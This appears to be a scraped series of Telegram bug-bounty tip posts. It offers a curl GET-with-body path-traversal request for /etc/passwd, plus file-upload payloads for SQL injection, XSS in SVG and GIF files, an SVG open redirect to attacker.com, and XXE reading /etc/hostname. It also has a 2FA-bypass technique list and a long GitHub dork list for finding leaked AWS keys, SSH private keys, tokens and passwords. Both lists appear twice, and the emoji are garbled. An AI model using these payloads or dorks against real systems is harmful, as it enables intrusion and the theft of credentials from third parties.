π¨ π¨ π¨ Too many people miss critical vulnerabilities because they assume a GET request can't have a body! π¨ π¨ π¨
This is how you can send such a request using #curl :
This is how you can send such a request using #curl :
$ curl 'target:1234/download?filename=TEST' --data 'filename=../../../../../../../etc/passwd' -X GET
π9π₯4β€3π₯°1
π3π₯1
Now you can detect phishing websites quickly with Nucleiβ€
nuclei -l websites_Possible_Phishing -tags phishing -itags phishing
Please open Telegram to view this post
VIEW IN TELEGRAM
β€3π₯3π1
SLQi
'sleep(20).jpg
sleep(25)-- -.jpg
Path traversal
../../etc/passwd/logo.png
../../../logo.png
XSS
-> Set file name filename="svg onload=alert(document.domain)>" , filename="58832_300x300.jpg<svg onload=confirm()>"
-> Upload using .gif file
GIF89a/<svg/onload=alert(1)>/=alert(document.domain)//;
-> Upload using .svg file
<svg xmlns="w3.org/2000/svg" onload="alert(1)"/>
-> <?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "w3.org/Graphics/SVG/1β¦"><svg version="1.1" baseProfile="full" xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
<script type="text/javascript">
alert("HolyBugx XSS");
</script>
</svg>
Open redirect
<code>
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg
onload="window.location='attacker.com'"
xmlns="w3.org/2000/svg">
<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
</svg>
</code>
XXE β³
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/hostname" > ]>
<svg width="500px" height="500px" xmlns="w3.org/2000/svg" xmlns:xlink="w3.org/1999/xlink" version="1.1
<text font-size="40" x="0" y="16">&xxe;</text>
</svg>
Please open Telegram to view this post
VIEW IN TELEGRAM
β€13π6π₯1
2FA Bypass Techniques
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
1. Response manipulation
2. Status code manipulation
3. 2FA code reusability
4. 2FA code leakage
5. Lack of brute-force protection
6. Bypassing 2FA with null or 000000
8. Missing 2FA code integrity validation
9.Handling of Previous Sessions
π₯12π5
π₯π₯Github-Dorkπππ₯π₯
Happy Hunting
π api_key
π app_AWS_SECRET_ACCESS_KEY
π app_secret
π authoriztion
π Ldap
π aws_access_key_id
π secret
π bash_history
π bashrc%20password
π beanstalkd
π client secre
π composer
π config
π credentials
π DB_PASSWORD
π dotfiles
π .env file
π .exs file
π extension:json mongolab.com
π extension:pem%20private
π extension:ppk private
π extension:sql mysql dump
π extension:yaml mongolab.com
π .mlab.com password
π mysql
π npmrc%20_auth
π passwd
π passkey
π rds.amazonaws.com password
π s3cfg
π send_key
π token
π filename:.bash_history
π filename:.bash_profile aws
π filename:.bashrc mailchimp
π filename:CCCam.cfg
π filename:config irc_pass
π filename:config.php dbpasswd
π filename:config.json auths
π filename:config.php pass
π filename:config.php dbpasswd
π filename:connections.xml
π filename:.cshrc
π filename:.git-credentials
π filename:.ftpconfig
π filename:.history
π filename:gitlab-recovery-codes.txt
π filename:.htpasswd
π filename:id_rsa
π filename:.netrc password
π FTP
π filename:wp-config.php
π git-credentials
π github_token
π HEROKU_API_KEY language:json
π HEROKU_API_KEY language:shell
π GITHUB_API_TOKEN language:shell
π oauth
π OTP
π databases password
π [WFClient] Password= extension:ica
π xoxa_Jenkins
π security_credentials
#bugbountytips #GitHub
Happy Hunting
π api_key
π app_AWS_SECRET_ACCESS_KEY
π app_secret
π authoriztion
π Ldap
π aws_access_key_id
π secret
π bash_history
π bashrc%20password
π beanstalkd
π client secre
π composer
π config
π credentials
π DB_PASSWORD
π dotfiles
π .env file
π .exs file
π extension:json mongolab.com
π extension:pem%20private
π extension:ppk private
π extension:sql mysql dump
π extension:yaml mongolab.com
π .mlab.com password
π mysql
π npmrc%20_auth
π passwd
π passkey
π rds.amazonaws.com password
π s3cfg
π send_key
π token
π filename:.bash_history
π filename:.bash_profile aws
π filename:.bashrc mailchimp
π filename:CCCam.cfg
π filename:config irc_pass
π filename:config.php dbpasswd
π filename:config.json auths
π filename:config.php pass
π filename:config.php dbpasswd
π filename:connections.xml
π filename:.cshrc
π filename:.git-credentials
π filename:.ftpconfig
π filename:.history
π filename:gitlab-recovery-codes.txt
π filename:.htpasswd
π filename:id_rsa
π filename:.netrc password
π FTP
π filename:wp-config.php
π git-credentials
π github_token
π HEROKU_API_KEY language:json
π HEROKU_API_KEY language:shell
π GITHUB_API_TOKEN language:shell
π oauth
π OTP
π databases password
π [WFClient] Password= extension:ica
π xoxa_Jenkins
π security_credentials
#bugbountytips #GitHub
π₯6π4